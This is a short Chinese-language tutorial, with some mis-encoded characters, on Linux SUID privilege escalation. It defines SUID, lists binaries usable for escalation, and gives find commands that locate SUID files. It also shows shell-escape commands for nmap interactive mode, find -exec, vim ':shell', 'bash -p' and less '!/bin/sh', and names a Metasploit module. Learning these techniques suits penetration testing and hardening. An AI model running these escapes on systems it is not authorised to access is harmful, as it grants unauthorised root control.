0x01 SUID

什么是suid？通俗的理解為其他用戶(hù)執(zhí)行這個(gè)程序的時(shí)候可以用該程序所有者/組的權(quán)限。

0x02 SUID提權(quán)

那么什么是suid提權(quán)呢？我理解的就是有個(gè)文件，它有s標(biāo)志，并且他輸入root，那么我們運(yùn)行這個(gè)程序就可以有了root的權(quán)限，并且這個(gè)程序還得能執(zhí)行命令，不然沒(méi)什么用處，那么我們就能從普通用戶(hù)提升到了root權(quán)限了。

0x03 常見(jiàn)的可用于suid提權(quán)的命令

Nmap

Vim

find

Bash

More

Less

Nano

cp

0x04 查找符合條件的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

0x05 詳細(xì)介紹

• nmap
  老版的nmap(2.02-5.21)有相互的功能--interactive

nmap> !sh
sh-3.2# whoami
root

msf中也有相關(guān)的模塊

exploit/unix/local/setuid_nmap

• find

如果find以SUID權(quán)限運(yùn)行，所有通過(guò)find執(zhí)行的命令都會(huì)以root權(quán)限運(yùn)行。

touch test
find test -exec whoami \;

• vim

如果vim以SUID運(yùn)行，就會(huì)繼承root用戶(hù)的權(quán)限，可以讀取系統(tǒng)中所有的文件

vim/vi
:shell

• bash

bash -p
># id

• less/more

less /etc/passwd
!/bin/sh